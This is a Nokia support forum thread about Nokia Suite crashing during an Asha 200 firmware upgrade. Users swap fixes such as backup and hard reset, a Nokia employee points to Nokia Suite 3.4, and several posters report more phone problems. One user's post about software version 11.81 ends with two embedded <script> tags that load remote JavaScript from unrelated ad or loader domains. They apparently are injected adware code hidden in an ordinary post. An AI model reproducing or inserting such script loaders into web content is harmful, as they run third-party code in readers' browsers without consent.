Search Discussions:
Advanced Search...
Welcome to Nokia Support Discussions! Here you can share advice and tips with thousands of other Nokia users around the world in English. Many Nokia employees also follow and participate in the discussions, see our guidelines for more information. Everyone can search and read the discussions, but to post your own question or reply to others, simply sign in with your Nokia account. If this is your first time here, you can choose an alias to represent you. And if you don't have a Nokia account yet, please register.

Nokia Suite quits on Asha 200 upgrade

Registered Member
yusufpur

Re: Nokia Suite quits on Asha 200 upgrade

I Have Same Problem With Asha 200 But Solved. Remove Memory Card Then Take Backup of Phone Using Nokia Suite.Then Hard Reset Phone By *#7370#. After Rest Compleat. Update Nokia Asha 200 Using Nokia Suite. Restore Backup u Have Taken And Reinsert Your Memory Card.
Thats All U Have Donit.
Please use plain text.
Professor
malange007

follow this link if your having trouble upgrading asha 200

/t5/Nokia-Suite/NOKIA-ASHA200-UPDATE-PROBLEM-SOLVED/td-p/1326069
Join my movement to bring a change in NOKIA for good by supporting my FORUM
http://discussions.europe.nokia.com/t5/Eseries-and-Communicators/NOKIA-MODERATORS-ONLY/td-p/1318965
Please use plain text.
sameerkol007

the nokia suite will not update for the update to happen you will have to do this, follow the link
/t5/Nokia-Suite/NOKIA-ASHA200-UPDATE-PROBLEM-SOLVED/td-p/1326069

Bikash

Please use plain text.
Registered Member
Aashish_Dakhane

I have face new problem some components like social networking which is deleted but after update it is not restored
Please use plain text.
Professor
malange007

You can download them from the nokia ovi store
Join my movement to bring a change in NOKIA for good by supporting my FORUM
http://discussions.europe.nokia.com/t5/Eseries-and-Communicators/NOKIA-MODERATORS-ONLY/td-p/1318965
Please use plain text.
Registered Member
Aashish_Dakhane

if user try to delete or system hang then os app never deleted .if deleted then its a bug in os and product quality is poor. when you update your os then your os app must be restore if it deleted due to any other resion.nokia ovi store can't provoid a single software through which we can handel our verious accounts like facebook,twitter orkut .social network app which is come along with nokia os is best
Please use plain text.
Registered Member
Aashish_Dakhane

i already do this step but no effect.only on way that we have to update flash memmory.which is not user friendly
Please use plain text.
Employee
magovoru

Hi Aashish_Dakhane,

Error has been fixed and Nokia Suite 3.4 contains the fix.

You can download the latest version from www.nokia.com/nokiasuite

Cheers,
Marina
Nokia Suite team

Click on the Star Icon below if my advice has helped you!
Please use plain text.
Registered Member
Sudipto

i am faceing some problem. My social and massageing app got demeged... How i get it?
Please use plain text.
Registered Member
samreuben

[ Edited ]

now nokia 200 software version 11.81 is avaliable through nokia suite.almost all problems is cleared by this new version.nokia store also running nice.90% of echo problem is reduced.but still cannot play mp3 directly one by one within a folder.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Please use plain text.
ekongson2

i was asked to update my nokia asha 200 browser but after updating my browser did not work again rather it will show conflicting app. show items. pls help me get rid of tnis.
Please use plain text.
saagar2

same problom with me any one have solution then plz help me

Please use plain text.
periwinkle28

My nokia Asha 201 crashes.

Please use plain text.